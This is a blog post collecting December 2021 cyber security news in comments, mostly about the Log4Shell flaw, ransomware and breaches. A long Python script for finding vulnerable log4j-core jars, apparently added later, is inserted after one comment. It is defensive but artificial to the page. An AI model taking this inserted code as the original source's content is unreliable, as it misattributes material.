Cyber Security News December 2021

This posting is here to collect cyber security news in December 2021.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

435 Comments

  1. Tomi Engdahl says:

    https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md
    Description
    Evidence
    • vCenter, vCloud
    • kb.vmware.com/s/global-search/%40uri#q=Log4j
    • VMware Response to CVE-2021-44228: Apache Log4j Remote Code Execution (87068)
    A critical vulnerability in Apache Log4j identified by CVE-2021-44228
    has been disclosed that may allow for remote code execution.
    VMware has classified this issue as critical and is working on
    publishing fixes and workarounds as a priority.

    Reply
  2. Tomi Engdahl says:

    Hackers Steal Research Data From Sweden’s Volvo Cars
    https://www.securityweek.com/hackers-steal-research-data-swedens-volvo-cars

    Swedish manufacturer Volvo Cars said Friday that hackers had stolen research and development data from its systems in a cyberattack.

    The company, owned by China’s Geely, “has become aware that one of its file repositories has been illegally accessed by a third party,” it said.

    “Investigations so far confirm that a limited amount of the company’s R&D property has been stolen during the intrusion,” Volvo added.

    It warned that “there may be an impact on the company’s operation” from the hack, sending its stock falling 3.5 percent in Stockholm, to 72.44 kronor ($8.00, 7.06 euros).

    But the company added there was likely no “impact on the safety or security of its customers’ cars or their personal data”.

    Reply
  3. Tomi Engdahl says:

    Indian PM’s Twitter Hacked Again by Crypto Scammers
    https://www.securityweek.com/indian-pms-twitter-hacked-again-crypto-scammers

    Indian Prime Minister Narendra Modi’s Twitter account was hacked Sunday with a message declaring his country had adopted bitcoin as legal tender and was distributing the cryptocurrency to citizens.

    Modi is a prolific tweeter and is the world’s most popular incumbent politician on the platform, with more than 73 million followers on his main account.

    A swiftly deleted tweet from his main @narendramodi handle said the Indian government had officially bought 500 bitcoin and was “and distributing them to all residents of the country”, along with a scam link.

    His office tweeted that the account was “very briefly compromised” and that Twitter had since restored control.

    Reply
  4. Tomi Engdahl says:

    UK Court Allows Assange’s Extradition to US for Spying Case
    https://www.securityweek.com/uk-court-permits-assange-extradition-us-spying-charges

    A British appellate court opened the door Friday for Julian Assange to be extradited to the United States by overturning a lower court’s decision that the WikiLeaks founder’s mental health was too fragile to withstand the American criminal justice system.

    The High Court in London ruled that U.S. assurances were enough to guarantee Assange would be treated humanely and directed a lower court judge to send the extradition request to Britain’s interior minister for review. Home Secretary Priti Patel, who oversees law enforcement in the U.K., will make the final decision on whether to extradite Assange.

    “There is no reason why this court should not accept the assurances as meaning what they say,″ the High Court ruling stated. “There is no basis for assuming that the USA has not given the assurances in good faith.”

    Assange’s fiancé, Stella Moris, called the decision a “grave miscarriage of justice” and said Assange’s lawyers would seek to appeal to the U.K. Supreme Court.

    “We will fight,” Moris said outside court, where supporters gathered with banners demanding Assange’s release.

    Reply
  5. Tomi Engdahl says:

    New White House policy gives agencies 24 hours to assess cyberattacks of potential national security concern
    https://www.cnn.com/2021/12/10/politics/white-house-red-line-policy-cyberattacks/index.html

    (CNN) – The White House has enacted a new policy requiring the FBI and other agencies to help US officials quickly assess whether a cyberattack “rises to the level of a national security concern” that could hamper the provision of key services such as fuel or food, according to a National Security Council memo obtained by CNN and two US officials.

    Reply
  6. Tomi Engdahl says:

    Critical Vulnerability In Java log4j Affecting UniFi, Apple, Minecraft, and Many Others!
    https://www.youtube.com/watch?v=CvkUPvIMM7o

    Huntress Blog Post
    Critical RCE Vulnerability: log4j – CVE-2021-44228
    https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java

    Our team is currently investigating CVE-2021-44228, a critical vulnerability that’s affecting a Java logging package log4j which is used in a significant amount of software, including Apache, Apple iCloud, Steam, Minecraft and others. Huntress is actively uncovering the effects of this vulnerability and will be frequently updating this page.

    If your organization uses the log4j library, you should upgrade to log4j-2.15.0.rc2 immediately. Be sure that your Java instance is up-to-date; however, it’s worth noting that this isn’t an across-the-board solution. You may need to wait until your vendors push security updates out for their affected products.

    The log4j package may be bundled in with software you use provided by any given vendor. In this scenario, unfortunately, the vendors themselves will need to push the security updates downstream. As you assess your own risk and threat model, please consider the components of the software you use and especially what may be publicly accessible.

    Fellow MSP community member Tom Lawrence had confirmed and informed Huntress that the UniFi controller platform is vulnerable. If you use this technology, we urge you to upgrade to the patched version 6.5.54 as soon as possible.

    Reply
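The advisory quoted above asks administrators to upgrade log4j and, where the library is bundled inside vendor software, to work out which components on their systems carry it. The following added example (not code from Huntress, from the page's author or from the Log4j project) shows one way a defender can build that inventory: it walks a directory tree, opens every .jar/.war/.ear archive, identifies log4j-core by its package path, reads the version from META-INF/MANIFEST.MF (falling back to the file name), and flags archives older than the 2.15.0 release named above that still contain the JndiLookup class, so a jar already treated with the widely published class-removal mitigation is not flagged again. The sample jars it scans are constructed in a temporary directory and are not real log4j builds; the version threshold and the path strings are parameters you would adjust to later guidance.

```python
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Dict, List, Optional

# Fixed release named in the advisory quoted above; later releases only raise the bar.
FIXED_VERSION = (2, 15, 0)
# Class whose removal from the jar is the published class-removal mitigation.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PREFIX = "org/apache/logging/log4j/core/"


@dataclass
class JarFinding:
    path: str
    version: tuple         # (major, minor, patch); (0, 0, 0) when unknown
    has_jndi_lookup: bool

    @property
    def vulnerable(self) -> bool:
        # Old release that still ships the JNDI lookup class; an unknown
        # version compares as old so it gets a manual look.
        return self.version < FIXED_VERSION and self.has_jndi_lookup


def parse_version(text: str) -> tuple:
    """'2.14.1' or '2.15.0-rc2' -> (2, 14, 1) / (2, 15, 0); missing parts become 0."""
    nums = [int(n) for n in re.findall(r"\d+", text)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def manifest_version(jar: zipfile.ZipFile) -> Optional[str]:
    """Implementation-Version from META-INF/MANIFEST.MF, if present."""
    try:
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def inspect_jar(path: str) -> Optional[JarFinding]:
    """Return a finding for a log4j-core archive, or None if it is unrelated."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        if not any(n.startswith(CORE_PREFIX) for n in names):
            return None
        text = manifest_version(jar)
        if text is None:  # fall back to the version embedded in the file name
            m = re.search(r"log4j-core-(\d+(?:\.\d+)*)", os.path.basename(path))
            text = m.group(1) if m else ""
        return JarFinding(path, parse_version(text), JNDI_LOOKUP_CLASS in names)


def scan_tree(root: str) -> List[JarFinding]:
    """Walk a directory tree and inspect every .jar/.war/.ear archive."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".jar", ".war", ".ear")):
                continue
            try:
                finding = inspect_jar(os.path.join(dirpath, name))
            except zipfile.BadZipFile:
                continue  # not a real archive; skip it
            if finding is not None:
                findings.append(finding)
    return sorted(findings, key=lambda f: f.path)


def _write_jar(path: str, entries: Dict[str, str]) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w") as jar:
        for name, data in entries.items():
            jar.writestr(name, data)


def build_sample_tree(root: str) -> None:
    """Constructed sample jars (not real log4j builds) so the scanner runs offline."""
    core = {CORE_PREFIX + "LoggerContext.class": "", JNDI_LOOKUP_CLASS: ""}
    _write_jar(os.path.join(root, "lib", "log4j-core-2.14.1.jar"),
               {"META-INF/MANIFEST.MF": "Implementation-Version: 2.14.1\n", **core})
    _write_jar(os.path.join(root, "lib", "log4j-core-2.15.0.jar"),
               {"META-INF/MANIFEST.MF": "Implementation-Version: 2.15.0\n", **core})
    # No version in the manifest: the scanner falls back to the file name.
    _write_jar(os.path.join(root, "app", "WEB-INF", "lib", "log4j-core-2.11.2.jar"),
               {"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n", **core})
    # Unrelated library: must not show up in the findings at all.
    _write_jar(os.path.join(root, "lib", "commons-example.jar"),
               {"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n", "org/example/Util.class": ""})


def run_demo() -> Dict[str, bool]:
    """Scan the constructed tree; map jar file name -> vulnerable flag."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return {os.path.basename(f.path): f.vulnerable for f in scan_tree(root)}


if __name__ == "__main__":
    for name, flagged in run_demo().items():
        print(f"{'VULNERABLE' if flagged else 'ok'}\t{name}")
```

Run it against a real installation by calling `scan_tree("/opt/myapp")` instead of the constructed tree. Note what it does not do: it does not open jars nested inside other jars (a shaded or fat jar hides log4j-core one level deeper), and it says nothing about a running JVM's classpath, so treat it as a first pass that feeds the vendor-by-vendor follow-up the advisory describes.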
  7. Tomi Engdahl says:

    Log4j warning raised to red – one of the most significant vulnerabilities
    https://www.kyberturvallisuuskeskus.fi/fi/varo_ttn2_5/2021
    The yellow warning published on 10.12.2021 has been changed to red now that the severity of the vulnerability has become clearer. More and more cases of exploitation of the vulnerable Log4j component, which is used extremely widely in internet services, are being observed. Administrators are required to react quickly. In this article we also answer frequently asked questions on the subject.

    Reply
  8. Tomi Engdahl says:

    A vulnerability was found on the internet that affects practically every user; the number of exploitation attempts exploded over the weekend https://www.hs.fi/talous/art-2000008472050.html
    Security researchers reported last week a vulnerability found in the Log4j component of the Apache organization, which provides open source software. The number of exploitation attempts related to the vulnerability grew explosively over the weekend, says the National Cyber Security Centre of the Finnish Transport and Communications Agency Traficom. “A pretty good summary of the situation is that the internet is on fire and an ordinary citizen can’t do anything about it,” says the centre’s information security specialist Juho Jauhiainen.

    Reply
  9. Tomi Engdahl says:

    The severity of the Java hole became clear: “The internet is on fire”
    https://www.tivi.fi/uutiset/java-aukon-vakavuus-kirkastui-internet-on-tulessa/5155b7b1-57d2-4b4b-8b09-318b50de6c35
    One small snippet of text: copy it, paste it into the right place, and you are done.
    The recently disclosed zero-day vulnerability, named Log4shell, is like a master key to the internet. It affects millions of companies, and exploiting it is so easy that even a grandmother from Pihtipudas could use it to break into a server remotely without logging into the system. also:
    https://www.is.fi/digitoday/tietoturva/art-2000008471124.html. also:
    https://www.iltalehti.fi/tietoturva/a/9408b302-744c-4afa-9b17-6d3f881ba470

    Reply
  10. Tomi Engdahl says:

    Ten families of malicious samples are spreading using the Log4j2 vulnerability Now https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/
    Over the past 2 days, we have captured samples from other families, and now the list of families has exceeded 10. It looks like the race between the offense and defense has started, and the offense side is wasting no time to jump into the game.

    log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228 https://research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/
    In this post, we first offer some context on the vulnerability, the released fixes (and their shortcomings), and finally our mitigation (or you can skip directly to our mitigation tool here).

    Reply
  11. Tomi Engdahl says:

    Bitcoin scammers take millions and personal data from their victims – a Finn can unknowingly end up complicit in even a drug cartel
    https://yle.fi/uutiset/3-12225404
    Scammers took almost a hundred thousand euros from Jarmo. The MOT editorial team began investigating the case and ended up on the trail of a huge scam factory.

    Reply
  12. Tomi Engdahl says:

    Diavol Ransomware
    https://thedfirreport.com/2021/12/13/diavol-ransomware/
    The malware (BazarLoader) was delivered to an endpoint via email, which included a link to OneDrive. The OneDrive link, directed the user to download a file that was a zip, which included an ISO inside.
    Once opened (mounted) on the users system, it was determined the ISO contained a LNK file and a DLL. The LNK file masqueraded as a Document enticing the user to click/open it. Once the user executed the LNK file, the BazarLoader infection was initiated. After around 42 hours post initial intrusion, the threat actors pushed towards completion of their final objective. RDP access was established from the central file server that the threat actors had compromised to all endpoints and a batch script named “kill.bat” was executed on all of the targeted machines.

    Reply
  13. Tomi Engdahl says:

    Karakurt rises from its lair
    https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation
    Accenture Security has identified a new threat group, the self-proclaimed Karakurt Hacking Team, that has impacted over 40 victims across multiple geographies. The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big game hunting approach. Based on intrusion analysis to date, the threat group focuses solely on data exfiltration and subsequent extortion, rather than the more destructive ransomware deployment. In addition, Accenture Security assesses with moderate-to-high confidence that the threat group’s extortion approach includes steps to avoid, as much as possible, drawing attention to its activities.

    Reply
  14. Tomi Engdahl says:

    Cyber-attack on Hellmann Worldwide Logistics https://www.infosecurity-magazine.com/news/cyberattack-on-hellmann-worldwide/
    A cyber-attack has been carried out against major German logistics provider Hellmann Worldwide Logistics. Hellmann said that since the attack was discovered, it has been under the constant observation of its Global Crisis Taskforce, which is analyzing the incident. The company has also hired “external renowned security specialists” to investigate the attack. Hellmann did not disclose the exact nature of the attack, which is still under investigation.

    Reply
  15. Tomi Engdahl says:

    Ukraine arrests 51 for selling data of 300 million people in US, EU https://www.bleepingcomputer.com/news/security/ukraine-arrests-51-for-selling-data-of-300-million-people-in-us-eu/
    Ukrainian law enforcement arrested 51 suspects believed to have been selling stolen personal data on hacking forums belonging to hundreds of millions worldwide, including Ukraine, the US, and Europe. “As a result of the operation, about 100 databases of personal data relevant for 2020-2021 were seized,” the Cyberpolice Department of the National Police of Ukraine said. “The seized databases contained information on more than 300 million citizens of Ukraine, Europe and the United States”

    Reply
  16. Tomi Engdahl says:

    Intel adds payout bonuses as it migrates bug bounty program to Intigriti https://portswigger.net/daily-swig/intel-adds-payout-bonuses-as-it-migrates-bug-bounty-program-to-intigriti
    Intel is applying a 12-month bonus incentive to bug bounty rewards on select lines of hardware and firmware, which lifts the payout ceiling for the most critical bugs from $100,000 to $150,000.

    Reply
  17. Tomi Engdahl says:

    Bugs in billions of WiFi, Bluetooth chips allow password, data theft https://www.bleepingcomputer.com/news/security/bugs-in-billions-of-wifi-bluetooth-chips-allow-password-data-theft/
    Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it’s possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device’s Bluetooth component. In their paper, the researchers explain how they could perform OTA (Over-the-Air) denial of service, code execution, extract network passwords, and read sensitive data on chipsets from Broadcom, Cypress, and Silicon Labs.
    Research paper (PDF): https://arxiv.org/pdf/2112.05719.pdf

    Reply
  18. Tomi Engdahl says:

    CISA Expands ‘Must-Patch’ List With Log4j, FortiOS, Other Vulnerabilities
    https://www.securityweek.com/cisa-expands-must-patch-list-log4j-fortios-other-vulnerabilities

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added 13 new vulnerabilities to its list of security errors known to be exploited, including Apache Log4j and Fortinet FortiOS bugs that were disclosed last week.

    Tracked as CVE-2021-44228 and dubbed Log4Shell, the Log4j flaw can be exploited to achieve remote code execution and it affects many applications. Thousands of organizations worldwide are potentially exposed to attacks and exploitation attempts are on the rise.

    Fortinet last week published an advisory to warn of an arbitrary file download vulnerability in FortiOS, which a local authenticated attacker could exploit using specially crafted update packages. The bug is tracked as CVE-2021-44168.

    Reply
  19. Tomi Engdahl says:

    Companies Respond to Log4Shell Vulnerability as Attacks Rise
    https://www.securityweek.com/companies-respond-log4shell-vulnerability-attacks-rise

    Government organizations and the private sector are responding to the disclosure of a critical vulnerability affecting the widely used Log4j logging utility, as exploitation attempts are on the rise.

    Apache Log4j is a Java-based logging tool that is included in various open source libraries, and is directly embedded in many popular software applications.

    It came to light recently that the cross-platform library is affected by a critical remote code execution vulnerability — tracked as CVE-2021-44228 and dubbed Log4Shell — that can be exploited to gain complete access to the targeted system by getting the affected application to log a specially crafted string.

    Log4Shell was reported to Log4j developers by the Alibaba cloud security team on November 24 and a patch was made available on December 6 with the release of version 2.15.0. Proof-of-concept (PoC) exploits were developed shortly after.

    The list of affected companies and software includes Apple, Tencent, Twitter, Baidu, Steam, Minecraft, Cloudflare, Amazon, Tesla, Palo Alto Networks, IBM, Pulse Secure, Ghidra, ElasticSearch, Apache, Google, Webex, LinkedIn, Cisco and VMware. The list is being regularly updated.

    Attacks exploiting Log4Shell

    Cloudflare reported seeing evidence of exploitation on December 1, but mass exploitation began only after the flaw was publicly disclosed. While most of the activity observed until now has focused on the identification of vulnerable systems exposed to the internet, there has been a significant increase in actual attacks exploiting Log4Shell.

    The SANS Institute reported seeing the zero-day vulnerability being exploited in the wild to deliver cryptocurrency miners.

    Cisco’s Talos research and intelligence unit has seen exploitation attempts by APT groups, as well as botnets such as Mirai. The Netlab unit at Chinese cybersecurity firm Qihoo 360 reported seeing Log4Shell attacks involving the Muhstik botnet.

    Jen Easterly, director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), on Friday issued a statement pointing out that the vulnerability has been added to the agency’s catalog of known exploited flaws, which compels federal civilian agencies to immediately address it.

    Reply
  20. Tomi Engdahl says:

    Mirai-Based ‘Manga’ Botnet Targets Recent TP-Link Vulnerability
    https://www.securityweek.com/mirai-based-manga-botnet-targets-recent-tp-link-vulnerability

    A newly discovered variant of the Mirai-based Manga botnet is targeting a vulnerability in TP-Link routers that was addressed last month.

    Tracked as CVE-2021-41653, the bug affects the TL-WR840N EU v5 home wireless router devices running firmware iterations up to version TL-WR840N(EU)_V5_171211. TP-Link released an update that patches the flaw on November 12, the same day the flaw was made public.

    Described as a post-authentication remote code execution vulnerability, the issue allows remote attackers to run arbitrary commands via crafted payloads in an IP address input field.

    The Mirai-based Manga botnet, Fortinet’s FortiGuard Labs reports, exploits the security error to fetch and execute a malicious script that in turn downloads the main binary payloads.

    Reply
  21. Tomi Engdahl says:

    Apple Patches 42 Security Flaws in Latest iOS Refresh
    https://www.securityweek.com/apple-patches-42-security-flaws-latest-ios-refresh

    Apple has released a major point-update to its flagship iOS mobile operating system, beefing up app privacy protections and patching at least 42 security defects that expose users to malicious hacker attacks.

    The new iOS 15.2 makeover from Cupertino documents security vulnerabilities in multiple components, some serious enough to lead to code execution attacks if iPhone or iPad users simply open image or audio files.

    According to an Apple advisory released Monday, 24 of the 42 documented CVEs could lead to arbitrary code execution attacks. The majority are listed as memory corruption, buffer overflows and use-after-free bugs, another confirmation that memory safety issues continue to haunt code shipped in Apple’s wildly popular products.

    https://support.apple.com/en-us/HT212976

    Reply
  22. Tomi Engdahl says:

    Logistics Firm Hellmann Scrambling to Recover From Cyberattack
    https://www.securityweek.com/logistics-firm-hellmann-scrambling-recover-cyberattack

    International logistics company Hellmann Worldwide Logistics is scrambling to restore operations after a cyberattack forced it to isolate its central data center from the rest of its environment.

    Just before the weekend, the company revealed that the incident materially affected its operations, mainly because of severed connections to the data center. The logistics provider also said it contracted external security specialists to help with the restoration process.

    As of Monday morning, Hellmann brought most operations back online, but wasn’t running at full capacity.

    Reply
  23. Tomi Engdahl says:

    Tim Starks / CyberScoop:
    CISA Director Jen Easterly says the Log4j flaw likely affects hundreds of millions of devices and may be the most serious bug she has seen in her career — Cybersecurity and Infrastructure Security Agency Director Jen Easterly told industry leaders in a phone briefing Monday that a vulnerability …

    CISA warns ‘most serious’ Log4j vulnerability likely to affect hundreds of millions of devices
    https://www.cyberscoop.com/log4j-cisa-easterly-most-serious/

    Cybersecurity and Infrastructure Security Agency Director Jen Easterly told industry leaders in a phone briefing Monday that a vulnerability in a widely-used logging library “is one of the most serious I’ve seen in my entire career, if not the most serious.”

    “We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” she said of the Apache Log4j flaw. The issue is an unauthenticated remote execution vulnerability that could allow an intruder to take over an affected device.

    It’s going to take “sustained effort” for organizations to become secure, with diligence needed even after applying patches from Apache, Gazlay said.

    “There’s no single action that fixes this issue,” Gazlay said. It’s a mistake to think anyone is “going to be done with this in a week or two.”

    Easterly’s advice was to make sure organizations have their security teams staffed over the holidays, take “all necessary steps to close easily exploitable weaknesses” and share even more information than usual with CISA.

    Reply
  24. Tomi Engdahl says:

    Dan Goodin / Ars Technica:
    Kronos, one of the largest HR and workflow management companies, says a ransomware attack knocked its systems offline, possibly for the next several weeks — Kronos outage will last several weeks. Firm advises customers to use other services. — As the world is beset by Log4Shell …

    As Log4Shell wreaks havoc, payroll service reports ransomware attack
    Kronos outage will last several weeks. Firm advises customers to use other services.
    https://arstechnica.com/information-technology/2021/12/as-log4shell-wreaks-havoc-payroll-service-reports-ransomware-attack/

    As the world is beset by Log4Shell, arguably the most severe vulnerability ever, one of the biggest human resources solutions providers is reporting a ransomware attack that has taken its systems offline, possibly for the next several weeks. So far, the company isn’t saying if that critical vulnerability was the means hackers used to breach the systems.

    Ten hours after that advisory, Daley published an update reporting that the cause of the outage was ransomware and that it “may take up to several weeks to restore system availability.”

    “We deeply regret the impact this is having on you, and we are continuing to take all appropriate actions to remediate the situation,” the Kronos representative wrote. “We recognize the seriousness of this issue and will provide another update within the next 24 hours.”

    Reply
  25. Tomi Engdahl says:

    Catalin Cimpanu / The Record:
    Cloudflare and Cisco Talos say Log4j zero-day attacks were first observed on December 1 and December 2, ahead of mass exploitation over the weekend

    Log4Shell attacks began two weeks ago, Cisco and Cloudflare say
    https://therecord.media/log4shell-attacks-began-two-weeks-ago-cisco-and-cloudflare-say/

    While a public proof-of-concept code was released last Thursday, attacks exploiting the Log4Shell vulnerability started two weeks ago.

    Reply
  26. Tomi Engdahl says:

    Inside the Race to Fix a Potentially Disastrous Software Flaw
    Employee at Alibaba’s cloud-security team alerted Apache’s developers of the flaw and urged them to ‘please hurry up’
    https://www.bloomberg.com/news/articles/2021-12-13/how-apache-raced-to-fix-a-potentially-disastrous-software-flaw

    At 2:51 p.m. on Nov. 24, members of an open-source software project received an alarming email. The contents threatened to undermine years of programming by a small group of volunteers and unleash massive cyberattacks across the globe.

    “I want to report a security bug,” wrote Chen Zhaojun, an employee on Alibaba Group Holding Ltd.’s cloud-security team, adding “the vulnerability has a major impact.”

    The message went on to describe how a hacker could take advantage of Log4j, a widely used software tool, to achieve what’s known as remote code execution, a hackers’ dream because they can remotely take over a computer.

    The message ultimately set off a global race to update critical computer systems, with senior U.S. cybersecurity officials describing the discovery as a “significant threat.” Left unfixed, the software could give attackers unfettered access to untold millions of computer systems.

    But behind the scenes, a small cadre of unpaid programmers went to work to patch the faulty software.

    It is open-source software that is maintained by a group of volunteer programmers as part of the nonprofit Apache Software Foundation, one of dozens of open-source projects that have become a crucial component of global commerce and that are mostly maintained by unpaid volunteers.

    After receiving the email from Chen, Apache’s volunteer programmers began working to fix the vulnerability before the rest of the world knew there was a problem.

    But on Dec. 8, the team received another email from Alibaba’s Chen, notifying them that someone had just revealed the details of the vulnerability on a Chinese blogging platform for the entire internet to see. “Some WeChat security chat groups are already discussing the details of the vulnerability, and some security researchers already have the vulnerability,” Chen wrote. “We promise to keep it secret until your official release version comes out. Please hurry up.”

    The person who published the details of the flaw, who uses a pseudonym, didn’t respond to a request for comment.

    By then, hackers had already started exploiting the flaw, according to a tweet by CloudFlare Chief Executive Officer Matthew Prince. Some 20 hours later, Apache’s team working on Log4j published a “patch” to fix the problem. That’s when hackers began “mass exploitation” of the flaw, according to Prince.

    In the frantic time since the flaw was publicly disclosed, researchers have concluded that the vulnerability had existed in Log4j since September 2013, apparently unknown to its vast universe of users.

    However, the impact of the Log4j flaw remains unknown. Because the software exists in so many products and services, it may be months — or even years — before every version of it receives the update, according to security experts. So far, no major hacks have been tied to the vulnerability.

    Security researchers have found applications by Apple, Twitter and dozens of other companies using Log4j. There is no indication any have suffered a security breach as a result.

    “I was thinking, ‘Oh my God. This is my project. And then I was thinking, Apple is involved. Twitter is impacted. Everything,” he said. “And then, I was just realizing, how many people were using this software. This is basically half of the world, maybe even more. This is just crazy.”

    He described the conversations among the Log4j group as dispassionate and earnest. “I know these people — they all have families and things they have to do. But they put everything aside and just sat down for the whole weekend and worked on that,” he said.

    The vulnerability discovered in Log4j highlights how much modern software relies on open source projects maintained by unpaid volunteers, and what happens when a major security vulnerability is discovered within one.

    “The scenarios are endless,” said Mark Curphey, founder of the Open Web Application Security Project

    Since the flaw was disclosed, some anger has been directed at Apache’s developers. And there were warning signs that Log4j may be vulnerable, including at a presentation at the Black Hat cybersecurity conference in 2016. There, researchers identified a method to exploit a broad class of software that included Log4j, according to Daniel Stenberg, who created one of the world’s most-used pieces of open-source software, called Curl, that is used for transferring data between applications.

    “Why wasn’t it fixed then? I really don’t know,” Stenberg said. “It seems the Log4j authors really didn’t understand that they had a ticking bomb in their code even after that was highlighted. Clearly the Log4j project needed an outsider to poke them in the eye and really make them aware of the problem. How do you force that to happen? Not easy.”

    Reply
  27. Tomi Engdahl says:

    Hackers launch over 1.2 million attacks through Log4J flaw
    Researchers claim Chinese government groups are among the perpetrators
    https://www.ft.com/content/d3c244f2-eaba-4c46-9a51-b28fc13d9551

    Hackers including Chinese state-backed groups have launched more than 1.2 million attacks on companies globally since last Friday
    Cyber security group Check Point said the attacks relating to the vulnerability had accelerated since Friday, and that at some points its researchers were seeing more than 100 attacks a minute.

    The flaw in Log4J allows attackers to easily gain remote control over computers running apps in Java, a popular programming language.

    Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), told industry executives that the vulnerability was “one of the most serious I’ve seen in my entire career, if not the most serious”, according to US media reports. Hundreds of millions of devices are likely to be affected, she said.

    Amazon, Apple, IBM, Microsoft and Cisco are among those that have rushed to put out fixes, but no severe breaches have been reported publicly so far.

    “With this vulnerability, attackers gain almost unlimited power — they can extract sensitive data, upload files to the server, delete data, install ransomware or pivot to other servers,”

    The source of the vulnerability is faulty code developed by unpaid volunteers at the non-profit Apache Software Foundation, which runs multiple open source projects, raising questions about the security of vital parts of IT infrastructure. Log4J has been downloaded millions of times.

    Reply
  28. Tomi Engdahl says:

    Chinese hackers are exploiting ‘fully weaponised’ software vulnerability which is causing ‘mayhem on the web’ and poses a threat to internet-connected devices worldwide, experts warn
    https://www.dailymail.co.uk/news/article-10307697/Chinese-hackers-exploiting-fully-weaponised-Log4shell-software-vulnerability.html

    Reply
  29. Tomi Engdahl says:

    Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild
    While most of the attacks observed so far seem to be targeting Linux servers, we have also seen attacks against systems running the Windows operating system. For these attacks, we have detected the attempt to deploy a ransomware family called Khonsari. also:
    https://twitter.com/JuhoJauhiainen/status/1470849684428443651?s=20

    Log4j: Getting ready for the long haul (CVE-2021-44228) https://isc.sans.edu/forums/diary/Log4j+Getting+ready+for+the+long+haul+CVE202144228/28130/
    Log4Shell will continue to haunt us for years to come. Dealing with log4shell will be a marathon. Treat it as such. Mick pointed that out in our live stream yesterday, and it is probably the most important thing you need to plan for now: How to live with log4shell long term.

    CISA tells federal agencies to patch Log4Shell before Christmas https://therecord.media/cisa-tells-federal-agencies-to-patch-log4shell-before-christmas/
    The US Cybersecurity and Infrastructure Security Agency has told federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve.

    CISA – Apache Log4j Vulnerability Guidance:
    https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance

    What the Log4Shell Bug Means for SMBs: Experts Weigh In https://threatpost.com/log4shell-bug-smbs-experts/177021/
    An exclusive roundtable of security researchers discuss the specific implications of CVE-2021-44228 for smaller businesses, including what’s vulnerable, what an attack looks like and how to remediate.

    Implications of Log4j Vulnerability for Operational Technology (OT) Networks https://www.dragos.com/blog/industry-news/implications-of-log4j-vulnerability-for-ot-networks/
    Given that Log4j has been a ubiquitous logging solution for Enterprise Java development for decades, Log4j has the potential to become a vulnerability that will persist within Industrial Control Systems (ICS) environments for years to come. Within ICS environments, Dragos anticipates OT operators will face one of three scenarios when working to mitigate Log4j vulnerabilities.

    Reply
  30. Tomi Engdahl says:

    Catalin Cimpanu / The Record:
    CISA orders US federal civilian agencies to patch systems affected by the Log4j vulnerability by December 24 — The US Cybersecurity and Infrastructure Security Agency has told federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve.

    CISA tells federal agencies to patch Log4Shell before Christmas
    https://therecord.media/cisa-tells-federal-agencies-to-patch-log4shell-before-christmas/

    Reply
  31. Tomi Engdahl says:

    Tal Eisner / Check Point Software:
    Analysis: Log4j attacks rose from a few thousand on December 10 to 800K+ within 72 hours; exploits have been attempted on ~44% of corporate networks globally — Precisely one year after the SolarWinds Hack, the groundbreaking supply chain attack the world experienced, and while organizations

    The Numbers Behind Log4j Vulnerability CVE-2021-44228
    https://www.epanorama.net/blog/2021/12/01/cyber-security-news-december-2021/comment-page-4/#comment-1746224

    Reply
  32. Tomi Engdahl says:

    Martin Matishak / The Record:
    The US Department of Homeland Security launches “Hack DHS”, a bug bounty program that pays hackers between $500 and $5,000 per flaw found in its systems — The Homeland Security Department has launched a bug bounty program that will allow hackers to report vulnerabilities …

    Homeland Security launches ‘Hack DHS’ bug bounty program
    https://therecord.media/homeland-security-launches-hack-dhs-bug-bounty-program/

    Reply
  33. Tomi Engdahl says:

    Bloomberg:
    Sources: the NSO Group is considering shuttering its Pegasus unit or selling it, amid US restrictions and the danger of defaulting on $450M in debt

    https://www.bloomberg.com/news/articles/2021-12-13/spyware-firm-nso-mulls-shutdown-of-pegasus-unit-sale-of-company

    Reply
  34. Tomi Engdahl says:

    Log4Shell attacks began two weeks ago, Cisco and Cloudflare say
    https://therecord.media/log4shell-attacks-began-two-weeks-ago-cisco-and-cloudflare-say/

    While a public proof-of-concept code was released last Thursday, attacks exploiting the Log4Shell vulnerability started two weeks ago.

    The first attacks were observed on December 1 and December 2, according to Cloudflare and Cisco Talos, respectively.

    Reply
  35. Tomi Engdahl says:

    LogJ4 is spreading rapidly, up to a hundred break-ins per minute
    https://etn.fi/index.php/13-news/12952-logj4-leviaeae-vauhdilla-jopa-sata-murtoa-minuutissa

